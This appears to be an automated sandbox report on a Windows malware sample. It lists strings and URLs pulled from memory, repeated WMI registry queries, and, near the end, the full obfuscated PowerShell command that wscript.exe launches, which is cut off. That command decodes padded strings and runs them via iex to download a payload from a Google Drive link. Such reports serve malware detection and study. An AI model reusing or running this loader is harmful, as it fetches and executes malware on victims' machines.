Source: |
Binary string: System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2003573234.00000000008A1000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2010781616.0000000006F36000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2010781616.0000000006F85000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: wab.pdbGCTL source: FTSKIaM.exe, 00000013.00000000.2378354849.0000000000A11000.00000020.00000001.01000000.00000008.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000009.00000002.2003573234.0000000000904000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: stem.Core.pdbS source: powershell.exe, 00000009.00000002.2010781616.0000000006F85000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: wab.pdb source: FTSKIaM.exe, FTSKIaM.exe, 00000013.00000000.2378354849.0000000000A11000.00000020.00000001.01000000.00000008.sdmp |
Source: powershell.exe, 00000003.00000002.2240319276.000001F0A32A9000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.ma |
Source: powershell.exe, 00000003.00000002.2240319276.000001F0A32A9000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.micro |
Source: powershell.exe, 00000009.00000002.2010781616.0000000006F36000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.microsoX |
Source: wscript.exe, 00000000.00000003.1405620829.000001A46831B000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/ |
Source: wscript.exe, 00000000.00000003.1521138231.000001A4663E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1521895044.000001A4663E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1520323681.000001A46635E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en |
Source: wscript.exe, 00000000.00000002.1522074715.000001A468230000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab |
Source: wscript.exe, 00000000.00000003.1405991772.000001A4682BB000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?d7c9d21128d36 |
Source: wscript.exe, 00000000.00000003.1406453153.000001A4682E2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1405991772.000001A4682BB000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabP |
Source: wscript.exe, 00000000.00000003.1521138231.000001A4663E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1521895044.000001A4663E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1520323681.000001A46635E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme |
Source: wscript.exe, 00000000.00000003.1406453153.000001A468296000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1406310996.000001A46826E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?d7c9d21128 |
Source: powershell.exe, 00000003.00000002.2126865356.000001F08C989000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.google.com |
Source: powershell.exe, 00000003.00000002.2126865356.000001F08C9C3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.usercontent.google.com |
Source: powershell.exe, 00000003.00000002.2224520722.000001F09AC40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2007966903.00000000055E8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000009.00000002.2004706353.00000000046D9000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000003.00000002.2126865356.000001F08ABD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2004706353.0000000004581000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000009.00000002.2004706353.00000000046D9000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000003.00000002.2126865356.000001F08ABD1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000009.00000002.2004706353.0000000004581000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 00000003.00000002.2126865356.000001F08B059000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9B0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://apis.google.com |
Source: powershell.exe, 00000009.00000002.2007966903.00000000055E8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000009.00000002.2007966903.00000000055E8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000009.00000002.2007966903.00000000055E8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000003.00000002.2126865356.000001F08C62C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.googP |
Source: powershell.exe, 00000003.00000002.2126865356.000001F08ADF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C62C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com |
Source: powershell.exe, 00000003.00000002.2126865356.000001F08ADF7000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1oD4tvDdy2-rKBIrZpCy_NRSR7VMtG_lyP |
Source: powershell.exe, 00000009.00000002.2004706353.00000000046D9000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1oD4tvDdy2-rKBIrZpCy_NRSR7VMtG_lyXR |
Source: powershell.exe, 00000003.00000002.2126865356.000001F08C9B0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.googh |
Source: powershell.exe, 00000003.00000002.2126865356.000001F08C9B0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com |
Source: powershell.exe, 00000003.00000002.2126865356.000001F08B05D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9B0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=1oD4tvDdy2-rKBIrZpCy_NRSR7VMtG_ly&export=download |
Source: powershell.exe, 00000003.00000002.2126865356.000001F08B05D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.comP |
Source: powershell.exe, 00000009.00000002.2004706353.00000000046D9000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000003.00000002.2126865356.000001F08BE7F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000003.00000002.2224520722.000001F09AC40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2007966903.00000000055E8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000003.00000002.2126865356.000001F08B059000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9B0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ssl.gstatic.com |
Source: powershell.exe, 00000003.00000002.2126865356.000001F08B059000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9B0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google-analytics.com;report-uri |
Source: powershell.exe, 00000003.00000002.2126865356.000001F08B059000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9B0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: powershell.exe, 00000003.00000002.2126865356.000001F08B059000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9B0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.googletagmanager.com |
Source: powershell.exe, 00000003.00000002.2126865356.000001F08B059000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9B0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.gstatic.com |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Overburdeningly = 1;$Haarrddernes='Substrin';$Haarrddernes+='g';Function Blomraadne($Suggestionen){$Kulsyre=$Suggestionen.Length-$Overburdeningly;For($Esrogs=5; $Esrogs -lt $Kulsyre; $Esrogs+=(6)){$Bilendes+=$Suggestionen.$Haarrddernes.Invoke($Esrogs, $Overburdeningly);}$Bilendes;}function Uudviklet($Sammenstuvningerne){. ($Subpellucidity) ($Sammenstuvningerne);}$Dulmes=Blomraadne 'Cha,tMRanchoBlomszCenteizonkmlUfejll halaa ,ump/ epos5.udek.duske0Delet Nonad(KvindW .elgiPrecinTrossd.kkupoUdv.kwSammesvalgb MeroNFili,TTo.ea R gar1Midta0Sildd.Ingra0d.ast;Udann .ordbW Pakki Twenn .ewy6Aands4 Flor;F tal Ori,ax Syst6A.ted4In us;Moloi Henler Ragiv Tupp:Trspr1Corne2,ehir1Pyrox.Fr sk0Misoc)Torke Ekko.G KnoweAfgifcHillekHydrooS.eln/Tabul2Optje0Sylte1 er t0 klyn0Endit1Warm,0commi1Glott SubinFHaardiMicror lipoeSpi nfDoledoVegetxphyti/Bjerg1.ntif2Chilt1Supre.Medbo0Uarb, ';$subdichotomies=Blomraadne 'Fraa.U AnfrsDr,meesoegmrLokal-AlgebATid bgomd sePr ctn UnmatKalpa ';$Rugemaskine=Blomraadne 'Brillh A lht .rogtOrchepNeedlsMedik:strib/Parel/ F icdomstbrOpiliiConcevAuriceSteps.,mertgSkydeoTyskeoDer,ig,aterlMassee Mani.Imparc Sibio E.evm.rogr/LatteuGermacAtmos?Gera,e RektxCnemipSommeoFuldvrCentrtOplad=Lepadd KoldoS delwStiplnArchblFrassoantipaCathodunder&Ph soiUnbo d P.rt= k al1depoloMys.aDDyref4RevistAgricvPrissDGua adAdipoyRever2Plump-Maskir,ddanKHartvBAtticIUoplarSpiroZStri.pPlackCId tsyrec p_UnbroNS.endR Sm.aSKar oRAssis7 ThyrV erdiMVrimltAndenGSjleh_Gl.bulForetyrehee ';$kattelemmes=Blomraadne 'Trf,e>Unr,c ';$Subpellucidity=Blomraadne ' DispiEmbele Mergx enne ';$Aluminate = Blomraadne ' atrieCatarc,laedhInd.boSiph, Rustn%t.ndra.espep,alaapFals,dAnimaaan istD.liraHygie%Br.ne\Misg STaf,faNoni.lR.nsktRneres Blanp HiemoTotaloUddatnAtt,sfEkspouVe.erl .oth.UnderD toldaPanteg,ndos nejp& Mand&Amazi shareeA.delcLegalh BagloMurha For.$Parke ';Uudviklet (Blomraadne 'Syge.$ HavegHaandlGe.peo PaabbKdedea nshelForka:BrndsT,orgei absulDeltrhA inauAp degBodywgSlethe NrklnPrikkd Op.seMegal=Dread(V,melcCrescmDurwaddiffu Sickl/,rgancL rdo Kant.$KorreARingdlStnd u W,gomNon ei.redinlun.eaUnwort Brn.e baga)Brynj ');Uudviklet (Blomraadne 'O.ert$BrudegBedralNig,roNonprbbiosyaAtomil Mail:BattlLMi.iseVictua kisknA.tioeRen.rr Adve=Li sf$emnetRpastouOmf,vgHypere Jo.om nnuea Embes TalmkResmiiLing.n UvureAfled.MystisTrevlpfigh |